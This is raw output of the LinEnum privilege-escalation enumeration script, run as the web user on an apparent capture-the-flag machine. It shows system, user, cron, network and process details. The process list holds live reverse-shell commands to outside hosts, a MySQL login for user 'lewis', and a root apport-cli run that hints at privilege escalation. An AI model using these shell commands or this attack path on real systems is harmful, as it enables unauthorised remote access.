#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Thu Dec  7 18:54:19 UTC 2023


### SYSTEM ##############################################
[-] Kernel information:
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 5.4.0-167-generic (buildd@lcy02-amd64-010) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.6 LTS"
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal


[-] Hostname:
devvortex


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
logan            pts/2    10.10.14.19      Thu Dec  7 18:16:15 +0000 2023


[-] Who else is logged on:
 18:54:19 up 56 min,  0 users,  load average: 4.13, 3.35, 3.36
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=998(lxd) gid=100(users) groups=100(users)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(fwupd-refresh) gid=118(fwupd-refresh) groups=118(fwupd-refresh)
uid=114(mysql) gid=119(mysql) groups=119(mysql)
uid=1000(logan) gid=1000(logan) groups=1000(logan)
uid=997(_laurel) gid=997(_laurel) groups=997(_laurel)


[-] It looks like we have some admin users:
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
fwupd-refresh:x:113:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
logan:x:1000:1000:,,,:/home/logan:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root  root  4.0K Sep 26 19:16 .
drwxr-xr-x 19 root  root  4.0K Oct 26 15:12 ..
drwxr-xr-x  3 logan logan 4.0K Nov 21 11:04 logan


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
PWD=/tmp/x
HOME=/var/www
USER=www-data
SHLVL=2
OLDPWD=/var/www/dev.devvortex.htb/templates/cassiopeia
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
lrwxrwxrwx 1 root root     7 Apr 23  2020 /bin -> usr/bin
lrwxrwxrwx 1 root root     8 Apr 23  2020 /sbin -> usr/sbin
drwxr-xr-x 2 root root 36864 Nov 21 10:59 /usr/bin
drwxr-xr-x 2 root root  4096 Oct 26 15:12 /usr/local/bin
drwxr-xr-x 2 root root  4096 Oct 26 15:12 /usr/local/sbin
drwxr-xr-x 2 root root 20480 Nov 21 10:55 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
/usr/bin/tmux
/usr/bin/screen


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK		022


[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 1042 Feb 13  2020 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x   2 root root 4096 Oct 26 15:12 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root  712 Mar 27  2020 php
-rw-r--r--   1 root root  191 Apr 23  2020 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x   2 root root 4096 Nov 21 10:55 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  376 Dec  4  2019 apport
-rwxr-xr-x   1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root  214 Apr  2  2020 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Oct 26 15:12 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Oct 26 15:12 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Oct 26 15:12 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  403 Apr 25  2022 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Systemd timers:
NEXT                        LEFT         LAST                        PASSED               UNIT                         ACTIVATES                     
Thu 2023-12-07 19:09:00 UTC 14min left   Thu 2023-12-07 18:39:04 UTC 15min ago            phpsessionclean.timer        phpsessionclean.service       
Fri 2023-12-08 00:00:00 UTC 5h 5min left Thu 2023-12-07 17:57:42 UTC 56min ago            logrotate.timer              logrotate.service             
Fri 2023-12-08 00:00:00 UTC 5h 5min left Thu 2023-12-07 17:57:42 UTC 56min ago            man-db.timer                 man-db.service                
Fri 2023-12-08 02:16:18 UTC 7h left      Thu 2023-10-26 16:09:17 UTC 1 months 11 days ago fwupd-refresh.timer          fwupd-refresh.service         
Fri 2023-12-08 03:51:51 UTC 8h left      Tue 2023-10-03 08:32:00 UTC 2 months 4 days ago  apt-daily.timer              apt-daily.service             
Fri 2023-12-08 06:21:34 UTC 11h left     Thu 2023-12-07 18:12:39 UTC 41min ago            apt-daily-upgrade.timer      apt-daily-upgrade.service     
Fri 2023-12-08 07:55:07 UTC 13h left     Thu 2023-12-07 18:42:15 UTC 12min ago            motd-news.timer              motd-news.service             
Fri 2023-12-08 18:12:39 UTC 23h left     Thu 2023-12-07 18:12:39 UTC 41min ago            systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2023-12-10 03:10:49 UTC 2 days left  Thu 2023-12-07 17:57:44 UTC 56min ago            e2scrub_all.timer            e2scrub_all.service           
Mon 2023-12-11 00:00:00 UTC 3 days left  Thu 2023-12-07 17:57:42 UTC 56min ago            fstrim.timer                 fstrim.service                

10 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.242  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:9063  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:90:63  txqueuelen 1000  (Ethernet)
        RX packets 1454331  bytes 265291628 (265.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1457858  bytes 513462147 (513.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4710  bytes 528096 (528.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4710  bytes 528096 (528.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:75:02 [ether] on eth0


[-] Nameserver(s):
nameserver 127.0.0.53


[-] Nameserver(s):
Global
       LLMNR setting: no                  
MulticastDNS setting: no                  
  DNSOverTLS setting: no                  
      DNSSEC setting: no                  
    DNSSEC supported: no                  
  Current DNS Server: 8.8.8.8             
         DNS Servers: 1.1.1.1             
                      8.8.8.8             
Fallback DNS Servers: 1.0.0.1             
          DNSSEC NTA: 10.in-addr.arpa     
                      16.172.in-addr.arpa 
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa 
                      18.172.in-addr.arpa 
                      19.172.in-addr.arpa 
                      20.172.in-addr.arpa 
                      21.172.in-addr.arpa 
                      22.172.in-addr.arpa 
                      23.172.in-addr.arpa 
                      24.172.in-addr.arpa 
                      25.172.in-addr.arpa 
                      26.172.in-addr.arpa 
                      27.172.in-addr.arpa 
                      28.172.in-addr.arpa 
                      29.172.in-addr.arpa 
                      30.172.in-addr.arpa 
                      31.172.in-addr.arpa 
                      corp                
                      d.f.ip6.arpa        
                      home                
                      internal            
                      intranet            
                      lan                 
                      local               
                      private             
                      test                

Link 2 (eth0)
      Current Scopes: none
DefaultRoute setting: no  
       LLMNR setting: yes 
MulticastDNS setting: no  
  DNSOverTLS setting: no  
      DNSSEC setting: no  
    DNSSEC supported: no  


[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 eth0


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      867/nginx: worker p 
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      867/nginx: worker p 
tcp6       0      0 :::22                   :::*                    LISTEN      -                   


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   


### SERVICES #############################################
[-] Running processes:
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 168112 11412 ?        Ss   17:57   0:02 /sbin/init maybe-ubiquity
root           2  0.0  0.0      0     0 ?        S    17:57   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   17:57   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   17:57   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   17:57   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<   17:57   0:00 [mm_percpu_wq]
root           9  0.2  0.0      0     0 ?        S    17:57   0:06 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I    17:57   0:03 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S    17:57   0:00 [migration/0]
root          12  0.0  0.0      0     0 ?        S    17:57   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S    17:57   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S    17:57   0:00 [cpuhp/1]
root          16  0.0  0.0      0     0 ?        S    17:57   0:00 [idle_inject/1]
root          17  0.0  0.0      0     0 ?        S    17:57   0:00 [migration/1]
root          18  0.2  0.0      0     0 ?        S    17:57   0:07 [ksoftirqd/1]
root          20  0.0  0.0      0     0 ?        I<   17:57   0:00 [kworker/1:0H-kblockd]
root          21  0.0  0.0      0     0 ?        S    17:57   0:00 [kdevtmpfs]
root          22  0.0  0.0      0     0 ?        I<   17:57   0:00 [netns]
root          23  0.0  0.0      0     0 ?        S    17:57   0:00 [rcu_tasks_kthre]
root          24  0.0  0.0      0     0 ?        S    17:57   0:00 [kauditd]
root          25  0.0  0.0      0     0 ?        S    17:57   0:00 [khungtaskd]
root          26  0.0  0.0      0     0 ?        S    17:57   0:00 [oom_reaper]
root          27  0.0  0.0      0     0 ?        I<   17:57   0:00 [writeback]
root          28  0.0  0.0      0     0 ?        S    17:57   0:00 [kcompactd0]
root          29  0.0  0.0      0     0 ?        SN   17:57   0:00 [ksmd]
root          30  0.0  0.0      0     0 ?        SN   17:57   0:00 [khugepaged]
root          77  0.0  0.0      0     0 ?        I<   17:57   0:00 [kintegrityd]
root          78  0.0  0.0      0     0 ?        I<   17:57   0:00 [kblockd]
root          79  0.0  0.0      0     0 ?        I<   17:57   0:00 [blkcg_punt_bio]
root          80  0.0  0.0      0     0 ?        I<   17:57   0:00 [tpm_dev_wq]
root          81  0.0  0.0      0     0 ?        I<   17:57   0:00 [ata_sff]
root          82  0.0  0.0      0     0 ?        I<   17:57   0:00 [md]
root          83  0.0  0.0      0     0 ?        I<   17:57   0:00 [edac-poller]
root          84  0.0  0.0      0     0 ?        I<   17:57   0:00 [devfreq_wq]
root          85  0.0  0.0      0     0 ?        S    17:57   0:00 [watchdogd]
root          88  0.0  0.0      0     0 ?        S    17:57   0:00 [kswapd0]
root          89  0.0  0.0      0     0 ?        S    17:57   0:00 [ecryptfs-kthrea]
root          91  0.0  0.0      0     0 ?        I<   17:57   0:00 [kthrotld]
root          92  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/24-pciehp]
root          93  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/25-pciehp]
root          94  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/26-pciehp]
root          95  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/27-pciehp]
root          96  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/28-pciehp]
root          97  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/29-pciehp]
root          98  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/30-pciehp]
root          99  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/31-pciehp]
root         100  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/32-pciehp]
root         101  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/33-pciehp]
root         102  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/34-pciehp]
root         103  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/35-pciehp]
root         104  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/36-pciehp]
root         105  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/37-pciehp]
root         106  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/38-pciehp]
root         107  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/39-pciehp]
root         108  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/40-pciehp]
root         109  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/41-pciehp]
root         110  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/42-pciehp]
root         111  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/43-pciehp]
root         112  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/44-pciehp]
root         113  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/45-pciehp]
root         114  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/46-pciehp]
root         115  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/47-pciehp]
root         116  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/48-pciehp]
root         117  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/49-pciehp]
root         118  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/50-pciehp]
root         119  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/51-pciehp]
root         120  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/52-pciehp]
root         121  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/53-pciehp]
root         122  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/54-pciehp]
root         123  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/55-pciehp]
root         124  0.0  0.0      0     0 ?        I<   17:57   0:00 [acpi_thermal_pm]
root         125  0.0  0.0      0     0 ?        S    17:57   0:00 [scsi_eh_0]
root         126  0.0  0.0      0     0 ?        I<   17:57   0:00 [scsi_tmf_0]
root         127  0.0  0.0      0     0 ?        S    17:57   0:00 [scsi_eh_1]
root         128  0.0  0.0      0     0 ?        I<   17:57   0:00 [scsi_tmf_1]
root         130  0.0  0.0      0     0 ?        I<   17:57   0:00 [vfio-irqfd-clea]
root         131  0.0  0.0      0     0 ?        I<   17:57   0:00 [ipv6_addrconf]
root         141  0.0  0.0      0     0 ?        I<   17:57   0:00 [kstrp]
root         144  0.0  0.0      0     0 ?        I<   17:57   0:00 [kworker/u5:0]
root         157  0.0  0.0      0     0 ?        I<   17:57   0:00 [charger_manager]
root         202  0.0  0.0      0     0 ?        I<   17:57   0:00 [cryptd]
root         216  0.0  0.0      0     0 ?        I<   17:57   0:00 [mpt_poll_0]
root         219  0.0  0.0      0     0 ?        I<   17:57   0:00 [mpt/0]
root         239  0.0  0.0      0     0 ?        S    17:57   0:00 [irq/16-vmwgfx]
root         240  0.0  0.0      0     0 ?        I<   17:57   0:00 [ttm_swap]
root         241  0.0  0.0      0     0 ?        S    17:57   0:00 [scsi_eh_2]
root         242  0.0  0.0      0     0 ?        I<   17:57   0:00 [scsi_tmf_2]
root         243  0.1  0.0      0     0 ?        I<   17:57   0:06 [kworker/1:1H-kblockd]
root         273  0.0  0.0      0     0 ?        I<   17:57   0:00 [raid5wq]
root         324  0.8  0.0      0     0 ?        S    17:57   0:27 [jbd2/sda2-8]
root         325  0.0  0.0      0     0 ?        I<   17:57   0:00 [ext4-rsv-conver]
root         358  0.1  0.0      0     0 ?        I<   17:57   0:03 [kworker/0:1H-kblockd]
root         380  0.1  0.3  71348 14528 ?        S<s  17:57   0:06 /lib/systemd/systemd-journald
root         412  0.0  0.1  22656  6136 ?        Ss   17:57   0:01 /lib/systemd/systemd-udevd
root         536  0.0  0.0      0     0 ?        I<   17:57   0:00 [kaluad]
root         537  0.0  0.0      0     0 ?        I<   17:57   0:00 [kmpath_rdacd]
root         538  0.0  0.0      0     0 ?        I<   17:57   0:00 [kmpathd]
root         539  0.0  0.0      0     0 ?        I<   17:57   0:00 [kmpath_handlerd]
root         540  0.0  0.4 214600 17948 ?        SLsl 17:57   0:00 /sbin/multipathd -d -s
root         569  0.0  0.0  11356  1684 ?        S<sl 17:57   0:01 /sbin/auditd
systemd+     574  0.0  0.1  90884  6036 ?        Ssl  17:57   0:00 /lib/systemd/systemd-timesyncd
root         589  0.0  0.2  47544 10576 ?        Ss   17:57   0:00 /usr/bin/VGAuthService
root         590  0.1  0.2 237780  8568 ?        Ssl  17:57   0:03 /usr/bin/vmtoolsd
root         608  0.0  0.1  99896  5920 ?        Ssl  17:57   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root         632  0.0  0.0      0     0 ?        S    17:57   0:00 [audit_prune_tre]
root         670  0.0  0.2 239300  9392 ?        Ssl  17:57   0:00 /usr/lib/accountsservice/accounts-daemon
message+     671  0.0  0.1   7484  4852 ?        Ss   17:57   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         682  0.0  0.0  81960  3724 ?        Ssl  17:57   0:00 /usr/sbin/irqbalance --foreground
root         683  0.0  0.2 236444  9164 ?        Ssl  17:57   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       684  0.0  0.1 224344  5100 ?        Ssl  17:57   0:00 /usr/sbin/rsyslogd -n -iNONE
root         691  0.0  0.1  17352  7740 ?        Ss   17:57   0:00 /lib/systemd/systemd-logind
root         692  0.0  0.3 395524 13528 ?        Ssl  17:57   0:00 /usr/lib/udisks2/udisksd
root         730  0.0  0.3 245096 13312 ?        Ssl  17:57   0:00 /usr/sbin/ModemManager
systemd+     815  0.0  0.3  24840 13340 ?        Ss   17:57   0:00 /lib/systemd/systemd-resolved
root         860  0.0  0.0   6816  3060 ?        Ss   17:57   0:00 /usr/sbin/cron -f
root         861  0.0  0.7 220696 31672 ?        Ss   17:57   0:00 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
daemon       865  0.0  0.0   3796  2160 ?        Ss   17:57   0:00 /usr/sbin/atd -f
root         866  0.0  0.0  51204  1596 ?        Ss   17:57   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data     867  2.5  0.1  52664  7024 ?        S    17:57   1:26 nginx: worker process
www-data     868  3.4  0.1  52856  7008 ?        S    17:57   1:58 nginx: worker process
root         869  0.0  0.1  12184  7384 ?        Ss   17:57   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         886  0.0  0.0   5828  1844 tty1     Ss+  17:57   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
mysql        910 23.1 12.2 1800488 491580 ?      Ssl  17:57  13:10 /usr/sbin/mysqld
www-data     959 32.6  1.0 297944 42000 ?        S    17:57  18:34 php-fpm: pool www
www-data     962  3.5  0.9 221744 37064 ?        S    17:57   2:01 php-fpm: pool www
www-data     964  0.6  0.8 223676 35140 ?        S    17:57   0:20 php-fpm: pool www
www-data     986  0.9  0.9 223784 37676 ?        S    17:58   0:32 php-fpm: pool www
www-data     987 30.9  1.0 224844 41120 ?        S    17:58  17:29 php-fpm: pool www
www-data     995  0.0  0.0   2608   596 ?        S    17:59   0:00 sh -c uname -a; w; id; /bin/sh -i
www-data    1011  0.0  0.0   2608   596 ?        S    17:59   0:00 /bin/sh -i
www-data    1024  0.0  0.0   2636  1988 ?        S    18:00   0:00 script -qc /bin/bash /dev/null
www-data    1025  0.0  0.0   2608   592 pts/0    Ss   18:00   0:00 sh -c /bin/bash
www-data    1026  0.0  0.0   4240  3616 pts/0    S    18:00   0:00 /bin/bash
www-data    1100  0.0  0.0   2608   536 ?        S    18:06   0:00 sh -c bash -c "bash -i >& /dev/tcp/10.10.14.19/1337 0>&1"
www-data    1101  0.0  0.0   3976  2972 ?        S    18:06   0:00 bash -c bash -i >& /dev/tcp/10.10.14.19/1337 0>&1
www-data    1102  0.0  0.0   4108  3480 ?        S    18:06   0:00 bash -i
www-data    1114  0.0  0.2  15956  9452 ?        S    18:07   0:00 python3 -c import pty;pty.spawn('/bin/bash')
www-data    1115  0.0  0.0   7304  3792 pts/1    Ss   18:07   0:00 /bin/bash
www-data    1220  0.0  0.2  22780 10504 pts/1    S+   18:10   0:00 mysql -u lewis -p joomla --password=x xxxxxxxxxxxxxxxxxx
root        1254  0.1  0.0      0     0 ?        I    18:12   0:02 [kworker/1:0-events]
root        1341  0.0  0.0   5780  3760 pts/0    S    18:15   0:00 su logan
logan       1360  0.0  0.2  19040  9636 ?        Ss   18:15   0:00 /lib/systemd/systemd --user
logan       1364  0.0  0.0 169472  3232 ?        S    18:15   0:00 (sd-pam)
root        1367  0.1  0.0      0     0 ?        I    18:15   0:03 [kworker/0:0-events]
logan       1373  0.0  0.1   8392  5356 pts/0    S    18:15   0:00 bash
www-data    1556  0.0  0.0   2608   596 ?        S    18:19   0:00 sh -c /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.177/4444 0>&1'
www-data    1557  0.0  0.0   3976  2988 ?        S    18:19   0:00 /bin/bash -c bash -i >& /dev/tcp/10.10.14.177/4444 0>&1
www-data    1558  0.0  0.0   4240  3536 ?        S    18:19   0:00 bash -i
logan       1638  0.0  0.0   7108  3960 ?        Ss   18:22   0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root        2109  0.0  0.1   9260  4584 pts/0    S    18:23   0:00 sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
root        2110  0.3  2.8 193152 114392 pts/0   S    18:23   0:06 /usr/bin/python3 /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
